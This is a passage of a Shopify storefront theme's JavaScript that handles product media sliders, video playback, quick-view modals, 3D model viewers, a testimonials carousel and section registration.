        obj.parent.classList.add('video-interactable'); // Previously, video was only interactable after slide change
  
        // If we have an element, it is in the visible/first slide,
        // and is muted, play it
        if (this._isFirstSlide(iframeId) && obj.options.style !== 'sound') {
          player.playVideo();
        }
      },
  
      _isFirstSlide: function(id) {
        return this.cache.mainSlider.querySelector(selectors.startingSlide + ' ' + '#' + id);
      },
  
      youtubePlayerStateChange: function(evt) {
        var iframeId = evt.target.getIframe().id;
        var obj = videoObjects[iframeId];
  
        switch (evt.data) {
          case -1: // unstarted
            // Handle low power state on iOS by checking if
            // video is reset to unplayed after attempting to buffer
            if (obj.attemptedToPlay) {
              obj.parent.classList.add('video-interactable');
            }
            break;
          case 0: // ended
            if (obj && obj.options.loop === 'true') {
              obj.videoPlayer.playVideo();
            }
            break;
          case 3: // buffering
            obj.attemptedToPlay = true;
            break;
        }
      },
  
      initMp4Video: function(div) {
        videoObjects[div.id] = {
          id: div.id,
          type: 'mp4'
        };
  
        if (this._isFirstSlide(div.id)) {
          this.playMp4Video(div.id);
        }
      },
  
      stopVideos: function() {
        for (var [id, vid] of Object.entries(videoObjects)) {
          if (vid.videoPlayer) {
            if (typeof vid.videoPlayer.stopVideo === 'function') {
              vid.videoPlayer.stopVideo(); // YouTube player
            }
          } else if (vid.type === 'mp4') {
            this.stopMp4Video(vid.id); // MP4 player
          }
        }
      },
  
      _getVideoType: function(video) {
        return video.getAttribute('data-video-type');
      },
  
      _getVideoDivId: function(video) {
        return video.id;
      },
  
      playMp4Video: function(id) {
        var player = this.container.querySelector('#' + id);
        var playPromise = player.play();
  
        if (playPromise !== undefined) {
          playPromise.then(function() {
            // Playing as expected
          })
          .catch(function(error) {
            // Likely low power mode on iOS, show controls
            player.setAttribute('controls', '');
            player.closest(selectors.videoParent).setAttribute('data-video-style', 'unmuted');
          });
        }
      },
  
      stopMp4Video: function(id) {
        var player = this.container.querySelector('#' + id);
        if (player && typeof player.pause === 'function') {
          player.pause();
        }
      },
  
      /*============================================================================
        Product images
      ==============================================================================*/
      initImageZoom: function() {
        var container = this.container.querySelector(this.selectors.imageContainer);
        if (!container) {
          return;
        }
        var imageZoom = new theme.Photoswipe(container, this.sectionId);
        container.addEventListener('photoswipe:afterChange', function(evt) {
          if (this.flickity) {
            this.flickity.goToSlide(evt.detail.index);
          }
        }.bind(this));
      },
  
      getThumbIndex: function(target) {
        return target.dataset.index;
      },
  
      updateVariantImage: function(evt) {
        var variant = evt.detail.variant;
        var sizedImgUrl = theme.Images.getSizedImageUrl(variant.featured_media.preview_image.src, this.settings.imageSize);
  
        var newImage = this.container.querySelector('.product__thumb[data-id="' + variant.featured_media.id + '"]');
        var imageIndex = this.getThumbIndex(newImage);
  
        // If there is no index, slider is not initalized
        if (typeof imageIndex === 'undefined') {
          return;
        }
  
        // Go to that variant image's slide
        if (this.flickity) {
          this.flickity.goToSlide(imageIndex);
        }
      },
  
      initProductSlider: function(variant) {
        // Stop if only a single image, but add active class to first slide
        if (this.cache.mainSlider.querySelectorAll(selectors.slide).length <= 1) {
          var slide = this.cache.mainSlider.querySelector(selectors.slide);
          if (slide) {
            slide.classList.add('is-selected');
          }
          return;
        }
  
        // Destroy slider in preparation of new initialization
        if (this.flickity && typeof this.flickity.destroy === 'function') {
          this.flickity.destroy();
        }
  
        // If variant argument exists, slideshow is reinitializing because of the
        // image set feature enabled and switching to a new group.
        // currentSlideIndex
        if (!variant) {
          var activeSlide = this.cache.mainSlider.querySelector(selectors.startingSlide);
          this.settings.currentSlideIndex = this._slideIndex(activeSlide);
        }
  
        var mainSliderArgs = {
          dragThreshold: 25,
          adaptiveHeight: true,
          avoidReflow: true,
          initialIndex: this.settings.currentSlideIndex,
          childNav: this.cache.thumbSlider,
          childNavScroller: this.cache.thumbScroller,
          childVertical: this.cache.thumbSlider.dataset.position === 'beside',
          wrapAround: false,
          callbacks: {
            onInit: this.onSliderInit.bind(this),
            onChange: this.onSlideChange.bind(this)
          }
        };
  
        // Override default settings if image set feature enabled
        if (this.settings.imageSetName) {
          var imageSetArgs = this.imageSetArguments(variant);
          mainSliderArgs = Object.assign({}, mainSliderArgs, imageSetArgs);
          this.updateImageSetThumbs(mainSliderArgs.imageSet);
        }
  
        this.flickity = new theme.Slideshow(this.cache.mainSlider, mainSliderArgs);
      },
  
      onSliderInit: function(slide) {
        // If slider is initialized with image set feature active,
        // initialize any videos/media when they are first slide
        if (this.settings.imageSetName) {
          this.prepMediaOnSlide(slide);
        }
      },
  
      onSlideChange: function(index) {
        if (!this.flickity) return;
  
        var prevSlide = this.cache.mainSlider.querySelector('.product-main-slide[data-index="'+this.settings.currentSlideIndex+'"]');
  
        // If imageSetName exists, use a more specific selector
        var nextSlide = this.settings.imageSetName ?
                        this.cache.mainSlider.querySelectorAll('.flickity-slider .product-main-slide')[index] :
                        this.cache.mainSlider.querySelector('.product-main-slide[data-index="'+index+'"]');
  
        prevSlide.setAttribute('tabindex', '-1');
        nextSlide.setAttribute('tabindex', 0);
  
        // Pause any existing slide video/media
        this.stopMediaOnSlide(prevSlide);
  
        // Prep next slide video/media
        this.prepMediaOnSlide(nextSlide);
  
        // Update current slider index
        this.settings.currentSlideIndex = index;
      },
  
      stopMediaOnSlide(slide) {
        // Stop existing video
        var video = slide.querySelector(selectors.productVideo);
        if (video) {
          var videoType = this._getVideoType(video);
          var videoId = this._getVideoDivId(video);
          if (videoType === 'youtube') {
            if (videoObjects[videoId].videoPlayer) {
              videoObjects[videoId].videoPlayer.stopVideo();
              return;
            }
          } else if (videoType === 'mp4') {
            this.stopMp4Video(videoId);
            return;
          }
        }
  
        // Stop existing media
        var currentMedia = slide.querySelector(this.selectors.media);
        if (currentMedia) {
          currentMedia.dispatchEvent(
            new CustomEvent('mediaHidden', {
              bubbles: true,
              cancelable: true
            })
          );
        }
      },
  
      prepMediaOnSlide(slide) {
        var video = slide.querySelector(selectors.productVideo);
        if (video) {
          this.flickity.reposition();
          var videoType = this._getVideoType(video);
          var videoId = this._getVideoDivId(video);
          if (videoType === 'youtube') {
            if (videoObjects[videoId].videoPlayer && videoObjects[videoId].options.style !== 'sound') {
              videoObjects[videoId].videoPlayer.playVideo();
              return;
            }
          } else if (videoType === 'mp4') {
            this.playMp4Video(videoId);
          }
        }
  
        var nextMedia = slide.querySelector(this.selectors.media);
        if (nextMedia) {
          nextMedia.dispatchEvent(
            new CustomEvent('mediaVisible', {
              bubbles: true,
              cancelable: true
            })
          );
          slide.querySelector('.shopify-model-viewer-ui__button').setAttribute('tabindex', 0);
          slide.querySelector('.product-single__close-media').setAttribute('tabindex', 0);
        }
      },
  
      _slideIndex: function(el) {
        return el.getAttribute('data-index');
      },
  
      /*============================================================================
        Products when in quick view modal
      ==============================================================================*/
      openModalProduct: function() {
        var initialized = false;
  
        if (!this.settings.modalInit) {
          this.blocksHolder = this.container.querySelector(selectors.blocksHolder);

          if (this.blocksHolder) {
            var url = this.blocksHolder.dataset.url;

            fetch(url).then(function(response) {
              return response.text();
            }).then(function(html) {
              var parser = new DOMParser();
              var doc = parser.parseFromString(html, 'text/html');
              var blocks = doc.querySelector(selectors.blocks);

              // Because the same product could be opened in quick view
              // on the page we load the form elements from, we need to
              // update any `id`, `for`, and `form` attributes
              blocks.querySelectorAll('[id]').forEach(el => {
                if (el.closest('.request-quote-overlay')) return;

                // Update input `id`
                var val = el.getAttribute('id');
                el.setAttribute('id', val + '-modal');

                // Update related label if it exists
                var label = blocks.querySelector(`[for="${val}"]`);
                if (label) {
                  label.setAttribute('for', val + '-modal');
                }

                // Update any collapsible elements
                var collapsibleTrigger = blocks.querySelector(`[aria-controls="${val}"]`);
                if (collapsibleTrigger) {
                  collapsibleTrigger.setAttribute('aria-controls', val + '-modal');
                }
              });

              // Update any elements with `form` attribute.
              // Form element already has `-modal` appended
              var form = blocks.querySelector(this.selectors.form);
              if (form) {
                var formId = form.getAttribute('id');
                blocks.querySelectorAll('[form]').forEach(el => {
                  el.setAttribute('form', formId);
                });
              }

              this.blocksHolder.innerHTML = '';
              this.blocksHolder.append(blocks);
              this.blocksHolder.classList.add('product-form-holder--loaded');

              this.cacheElements();

              this.formSetup();
              this.updateModalProductInventory();

              if (Shopify && Shopify.PaymentButton) {
                Shopify.PaymentButton.init();
              }

              // Re-hook up collapsible box triggers
              theme.collapsibles.init(this.container);

              if (theme.productAccordion && typeof theme.productAccordion.init === 'function') {
                theme.productAccordion.init(this.container);
              }

              document.dispatchEvent(new CustomEvent('quickview:loaded', {
                detail: {
                  productId: this.productId
                }
              }));
            }.bind(this));
          }

          // Product setup, the Flickity slider (~230ms) and media listeners ran
          // synchronously inside the open click. They run after the popup has
          // painted instead: rAF guarantees a frame first, setTimeout puts the
          // work after it. modalInit is set now so a quick re-open can't
          // trigger this twice while it's pending.
          requestAnimationFrame(() => {
            setTimeout(() => {
              this.productSetup();
              this.videoSetup();
              this.customMediaListners();

              // Flickity init is ~300ms, so it waits for an idle period (1s cap)
              // instead of running right after the popup's first frame.
              var startSlider = () => this.initProductSlider();
              var whenIdle = window.requestIdleCallback
                ? function(fn) { window.requestIdleCallback(fn, { timeout: 1000 }); }
                : function(fn) { setTimeout(fn, 300); };

              // Enable product slider in quick view
              // 1. with image sets enabled, make sure we have this.variants before initializing
              // 2. initialize normally, form data not required
              if (this.settings.imageSetName) {
                if (this.variants) {
                  whenIdle(startSlider);
                } else {
                  document.addEventListener('quickview:loaded', function(evt) {
                    if (evt.detail.productId === this.productId) {
                      whenIdle(startSlider);
                    }
                  }.bind(this));
                }
              } else {
                whenIdle(startSlider);
              }
            }, 0);
          });

          this.settings.modalInit = true;
        } else {
          initialized = true;
        }

        document.dispatchEvent(new CustomEvent('quickview:open', {
          detail: {
            initialized: initialized,
            productId: this.productId
          }
        }));
      },
  
      // Recommended products load via JS and don't add variant inventory to the
      // global variable that we later check. This function scrapes a data div
      // to get that info and manually add the values.
      updateModalProductInventory: function() {
        window.inventories = window.inventories || {};
        this.container.querySelectorAll('.js-product-inventory-data').forEach(el => {
          var productId = el.dataset.productId;
          window.inventories[productId] = {};
  
          el.querySelectorAll('.js-variant-inventory-data').forEach(el => {
            window.inventories[productId][el.dataset.id] = {
              'quantity': el.dataset.quantity,
              'policy': el.dataset.policy,
              'incoming': el.dataset.incoming,
              'next_incoming_date': el.dataset.date
            }
          });
        });
      },
  
      closeModalProduct: function() {
        this.stopVideos();
      },
  
      /*============================================================================
        Product media (3D)
      ==============================================================================*/
      initModelViewerLibraries: function() {
        var modelViewerElements = this.container.querySelectorAll(this.selectors.media);
        if (modelViewerElements.length < 1) return;
  
        theme.ProductMedia.init(modelViewerElements, this.sectionId);
      },
  
      initShopifyXrLaunch: function() {
        document.addEventListener(
          'shopify_xr_launch',
          function() {
            var currentMedia = this.container.querySelector(
              this.selectors.productMediaWrapper +
                ':not(.' +
                self.classes.hidden +
                ')'
            );
            currentMedia.dispatchEvent(
              new CustomEvent('xrLaunch', {
                bubbles: true,
                cancelable: true
              })
            );
          }.bind(this)
        );
      },
  
      customMediaListners: function() {
        document.querySelectorAll(this.selectors.closeMedia).forEach(el => {
          el.addEventListener('click', function() {
            var slide = this.cache.mainSlider.querySelector(selectors.currentSlide);
            var media = slide.querySelector(this.selectors.media);
            if (media) {
              media.dispatchEvent(
                new CustomEvent('mediaHidden', {
                  bubbles: true,
                  cancelable: true
                })
              );
            }
          }.bind(this))
        });
  
        var modelViewers = this.container.querySelectorAll('model-viewer');
        if (modelViewers.length) {
          modelViewers.forEach(el => {
            el.addEventListener('shopify_model_viewer_ui_toggle_play', function(evt) {
              this.mediaLoaded(evt);
            }.bind(this));
  
            el.addEventListener('shopify_model_viewer_ui_toggle_pause', function(evt) {
              this.mediaUnloaded(evt);
            }.bind(this));
          });
        }
      },
  
      mediaLoaded: function(evt) {
        this.container.querySelectorAll(this.selectors.closeMedia).forEach(el => {
          el.classList.remove(classes.hidden);
        });
  
        if (this.flickity) {
          this.flickity.setDraggable(false);
        }
      },
  
      mediaUnloaded: function(evt) {
        this.container.querySelectorAll(this.selectors.closeMedia).forEach(el => {
          el.classList.add(classes.hidden);
        });
  
        if (this.flickity) {
          this.flickity.setDraggable(true);
        }
      }
    });
  
    return Product;
  })();
  
  theme.Testimonials = (function() {
    var defaults = {
      adaptiveHeight: true,
      avoidReflow: true,
      pageDots: true,
      prevNextButtons: false
    };
  
    function Testimonials(container) {
      this.container = container;
      var sectionId = container.getAttribute('data-section-id');
      this.slideshow = container.querySelector('#Testimonials-' + sectionId);
      this.namespace = '.testimonial-' + sectionId;
  
      if (!this.slideshow) { return }
  
      theme.initWhenVisible({
        element: this.container,
        callback: this.init.bind(this),
        threshold: 600
      });
    }
  
    Testimonials.prototype = Object.assign({}, Testimonials.prototype, {
      init: function() {
        // Do not wrap when only a few blocks
        if (this.slideshow.dataset.count <= 3) {
          defaults.wrapAround = false;
        }
  
        this.flickity = new theme.Slideshow(this.slideshow, defaults);
  
        // Autoscroll to next slide on load to indicate more blocks
        if (this.slideshow.dataset.count > 3) {
          setTimeout(function() {
            this.flickity.goToSlide(1);
          }.bind(this), 1000);
        }
      },
  
      onUnload: function() {
        if (this.flickity && typeof this.flickity.destroy === 'function') {
          this.flickity.destroy();
        }
      },
  
      onDeselect: function() {
        if (this.flickity && typeof this.flickity.play === 'function') {
          this.flickity.play();
        }
      },
  
      onBlockSelect: function(evt) {
        var slide = this.slideshow.querySelector('.testimonials-slide--' + evt.detail.blockId)
        var index = parseInt(slide.dataset.index);
  
        if (this.flickity && typeof this.flickity.pause === 'function') {
          this.flickity.goToSlide(index);
          this.flickity.pause();
        }
      },
  
      onBlockDeselect: function() {
        if (this.flickity && typeof this.flickity.play === 'function') {
          this.flickity.play();
        }
      }
    });
  
    return Testimonials;
  })();
  

  theme.isSessionStorageSupported = function() {
    // Return false if we are in an iframe without access to sessionStorage
    if (window.self !== window.top) {
      return false;
    }

    var testKey = 'test';
    var storage = window.sessionStorage;
    try {
      storage.setItem(testKey, '1');
      storage.removeItem(testKey);
      return true;
    } catch (error) {
      return false;
    }
  };

  /**
   * After Show More appends new grid items, native lazy-loaded images wait for viewport.
   * Force eager load + mark image-element wrappers loaded so images fetch immediately.
   */
  theme.forceLoadImagesForShowMore = function(root) {
    if (!root || !root.querySelectorAll) return;
    root.querySelectorAll('img').forEach(function(img) {
      img.loading = 'eager';
      img.setAttribute('loading', 'eager');
      if ('fetchPriority' in img) {
        try {
          img.fetchPriority = 'high';
        } catch (e) {}
      }
    });
    root.querySelectorAll('image-element').forEach(function(el) {
      var imageWrap = el.closest('.image-wrap');
      if (imageWrap) imageWrap.classList.add('loaded');
      var skrimWrap = el.closest('.skrim__link');
      if (skrimWrap) skrimWrap.classList.add('loaded');
    });
  };

  theme.reinitProductGridItem = function(scope) {
    if (AOS) {AOS.refreshHard()}

    if (!document.documentElement.classList.contains('modal-open')) {
      theme.initQuickShop();
    }

    // Refresh reviews app
    if (window.SPR) {SPR.initDomEls();SPR.loadBadges()}

    // Re-hook up collapsible box triggers
    theme.collapsibles.init();
  };

  /*============================================================================
    Things that don't require DOM to be ready
  ==============================================================================*/
  theme.config.hasSessionStorage = theme.isSessionStorageSupported();
  AOS.init({
    easing: 'ease-out-quad',
    once: true,
    offset: 60,
    disableMutationObserver: true
  });

  // Trigger events when going between breakpoints
  theme.config.bpSmall = matchMedia(theme.config.mediaQuerySmall).matches;
  matchMedia(theme.config.mediaQuerySmall).addListener(function(mql) {
    if (mql.matches) {
      theme.config.bpSmall = true;
      document.dispatchEvent(new CustomEvent('matchSmall'));
    }
    else {
      theme.config.bpSmall = false;
      document.dispatchEvent(new CustomEvent('unmatchSmall'));
    }
  });

  /*============================================================================
    Things that require DOM to be ready
  ==============================================================================*/
  function DOMready(callback) {
    if (document.readyState != 'loading') callback();
    else document.addEventListener('DOMContentLoaded', callback);
  }

  // Load generic JS. Also reinitializes when sections are
  // added, edited, or removed in Shopify's editor
  theme.initGlobals = function() {
    theme.collapsibles.init();
    theme.videoModal();
  }

  DOMready(function(){
    theme.sections = new theme.Sections();

    theme.sections.register('slideshow-section', theme.SlideshowSection);
    theme.sections.register('header', theme.HeaderSection);
    theme.sections.register('footer', theme.FooterSection);
    theme.sections.register('product', theme.Product);
    theme.sections.register('password-header', theme.PasswordHeader);
    theme.sections.register('collection-switcher', theme.CollectionSwitcher);
    theme.sections.register('map', theme.Maps);
    theme.sections.register('blog', theme.Blog);
    theme.sections.register('newsletter-popup', theme.NewsletterPopup);
    theme.sections.register('video-section', theme.VideoSection);
    theme.sections.register('photoswipe', theme.Photoswipe);
    theme.sections.register('store-availability', theme.StoreAvailability);
    theme.sections.register('fading-images', theme.FadingImages);
    theme.sections.register('testimonials', theme.Testimonials);
    theme.sections.register('background-image', theme.BackgroundImage);
    theme.sections.register('collection-template', theme.Collection);

    theme.initGlobals();
    theme.initQuickShop();
    theme.rteInit();
    theme.articleImages();

    if (document.body.classList.contains('template-cart')) {
      var cartPageForm = document.getElementById('CartPageForm');
      if (cartPageForm) {
        new theme.CartForm(cartPageForm);
      }
    }

    if (theme.settings.isCustomerTemplate) {
      theme.customerTemplates();
    }

    theme.pageTransitions();

    document.dispatchEvent(new CustomEvent('page:loaded'));
  });
})();
